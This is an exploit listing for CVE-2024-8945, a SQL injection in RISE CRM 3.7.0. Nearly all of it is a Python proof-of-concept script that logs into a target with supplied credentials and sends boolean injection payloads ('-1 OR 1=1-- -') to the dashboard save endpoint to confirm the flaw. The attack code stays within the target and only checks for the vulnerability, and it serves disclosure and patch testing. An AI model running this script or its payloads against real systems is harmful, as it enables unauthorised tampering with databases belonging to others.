CodeCanyon RISE CRM 3.7.0 - SQL Injection

# Exploit Title: CodeCanyon RISE CRM 3.7.0 - SQL Injection
# Google Dork: N/A
# Date: September 19, 2024
# Exploit Author: Jobyer Ahmed
# Author Homepage: https://bytium.com
# Vulnerable Version: 3.7
# Patched Version: 3.7.1
# Tested on: Ubuntu 24.04, Debian Testing
##########################################
# CVE: CVE-2024-8945
############Instruction#######################
# 1. Login to Ultimate Project Manager 3.7
# 2. Add a New Dashboard
# 3. Launch the PoC Script
#
# Usage: python3 script.py <base_url> <email> <password>
###########################################


import requests
import sys
from termcolor import colored

def login_and_capture_session(base_url, email, password):
    login_url = f"{base_url}/index.php/signin/authenticate"
    login_data = {"email": email, "password": password, "redirect": ""}
    login_headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"}
    session = requests.Session()
    response = session.post(login_url, data=login_data, headers=login_headers, verify=False)
    if response.status_code == 200 and "dashboard" in response.url:
        print(colored("[*] Logged in successfully.", "green"))
        return session
    else:
        print(colored("[!] Login failed.", "red"))
        return None

def send_payload(session, target_url, payload):
    data = {
        "id": payload,
        "data": "false",
        "title": "PoC Test",
        "color": "#ff0000"
    }
    response = session.post(target_url, headers=session.headers, data=data, verify=False)
    return response

def verify_vulnerability(session, target_url):
    failed_payload = "-1 OR 1=2-- -"
    failed_response = send_payload(session, target_url, failed_payload)
    
    print(colored(f"\nFailed SQL Injection (False Condition) payload: {failed_payload}", "yellow"))
    print(colored(f"{failed_response.text[:200]}", "cyan"))  
    
    successful_payload = "-1 OR 1=1-- -"
    successful_response = send_payload(session, target_url, successful_payload)
    
    if successful_response.status_code == 200 and "The record has been saved." in successful_response.text:
        print(colored(f"[*] Vulnerability confirmed via SQL injection! Payload used: {successful_payload}", "green"))
        print(colored(f"[*] Successful SQL Injection Response:\n{successful_response.text[:200]}", "cyan"))
    
        print(colored("\nStatus: Vulnerable! Upgrade to patched version!", "red"))
    else:
        print(colored("\nNot vulnerable!","red"))

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python3 script.py <base_url> <email> <password>")
        sys.exit(1)

    base_url, email, password = sys.argv[1], sys.argv[2], sys.argv[3]
    session = login_and_capture_session(base_url, email, password)
    if not session:
        sys.exit(1)

    session.headers.update({"User-Agent": "Mozilla/5.0", "Accept": "application/json", "X-Requested-With": "XMLHttpRequest"})
    target_url = f"{base_url}/index.php/dashboard/save"

    verify_vulnerability(session, target_url)